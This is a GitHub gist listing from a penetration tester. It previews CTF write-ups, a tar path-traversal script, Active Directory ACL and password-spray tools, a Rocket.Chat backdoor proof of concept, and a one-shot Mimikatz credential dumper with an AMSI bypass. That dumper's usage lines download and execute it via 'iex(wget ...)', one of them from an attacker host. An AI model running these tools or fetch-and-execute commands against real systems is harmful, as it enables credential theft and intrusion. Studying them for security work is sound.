Skip to content

Instantly share code, notes, and snippets.

Avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / intigrity_may22_xss_chall.txt
Last active Jun 5, 2022
Intigriti May '22 XSS Challenge - Prototype Pollution Writeup
View intigrity_may22_xss_chall.txt
@author Pichaya (LongCat) Morimoto (p.morimoto@sth.sh)
Challenge: https://challenge-0522.intigriti.io/challenge/challenge.html
จุดประสงค์คือต้องทำ XSS โดยที่มีการป้องกันไว้ด้วย
(1) ไม่ได้รับค่า User Input มาแสดงตรง ๆ รับแค่ Index (ตัวเลข) แล้วไป Lookup Content ที่เป็น HTML มาแสดง
(2) HTML Content (Static แบบ Fixed ไว้) ที่ Lookup มายังจะโดน Sanitize ต่อด้วยฟังก์ชัน filterXSS() จาก lib ชื่อ xss-js
Tech Stack:
@pich4ya
pich4ya / install_medusa_macos.txt
Last active Jun 1, 2022
Medusa installation on MacOS 12.4
View install_medusa_macos.txt
I got this error during `make` for Medusa installation on MacOS 12.4
```bash
git clone https://github.com/jmk-foofus/medusa
cd medusa
./configure
make && make install
[..]
medusa-net.c:349:28: error: implicit declaration of function 'TLS_client_method' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
sslContext = SSL_CTX_new(TLS_client_method());
@pich4ya
pich4ya / Spiky_Tamagotchy_Writeup.md
Last active Aug 6, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Spiky Tamagotchy Writeup
View Spiky_Tamagotchy_Writeup.md

info

Captain Spiky comes from a rare species of creatures who can only breathe underwater. During the energy-crisis war, he was captured as a war prisoner and later forced to be a Tamagotchi pet for a child of a general of nomadic tribes. He is forced to react in specific ways and controlled remotely purely for the amusement of the general's children. The Paraman crew needs to save the captain of his misery as he is potentially a great asset for the war against Draeger. Can you hack into the Tamagotchi controller to rescue the captain?

techstack

  • node.js
  • express.js
  • mysql
  • alpine docker
@pich4ya
pich4ya / Genesis_Wallet_Writeup.txt
Created May 19, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Genesis Wallet Writeup
View Genesis_Wallet_Writeup.txt
# author Pichaya Morimoto (p.morimoto@sth.sh)
Unintened solution.
You create 2 users. Then, do transfer -9999 amount from one account to another.
POST /api/transactions/create HTTP/1.1
[...]
Content-Length: 84
@pich4ya
pich4ya / Acnologia_Portal_Writeup.txt
Last active Jun 1, 2022
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Acnologia Portal Writeup
View Acnologia_Portal_Writeup.txt
# author Pichaya Morimoto (p.morimoto@sth.sh)
1. Register and Login
2. Submit Bug Report
Vulns:
- Tar Unzip Path Traversal
- Tar content => Overwrite flask_session's file type
View tarbomb.py
#!/bin/python
# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
# Copyright 2020 Andrew Scott
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE
@pich4ya
pich4ya / Find-AclSth.ps1
Created Apr 16, 2022
Modified version of PowerView's Find-InterestingDomainAcl (Previously known as Invoke-ACLScanner) / Require PowerView.ps1
View Find-AclSth.ps1
function Find-AclSth {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
View Invoke-LocalUserSprayAttack.ps1
<#
Author: Itamar Mizrahi (@MrAnde7son)
License: GNU v3
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-LocalUserSprayAttack
{
<#
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active Aug 12, 2022
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
View Invoke-OneShot-Mimikatz.ps1
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / rocket_chat_backdoor.txt
Created Feb 11, 2022
Rocket.Chat Backdoor with an admin user role
View rocket_chat_backdoor.txt
@author Pichaya Morimoto (p.morimoto@sth.sh)
Tested on Rocket.Chat 3.16.1
As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat
"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered."
However, no exact instruction was given. Here we go.
PoC: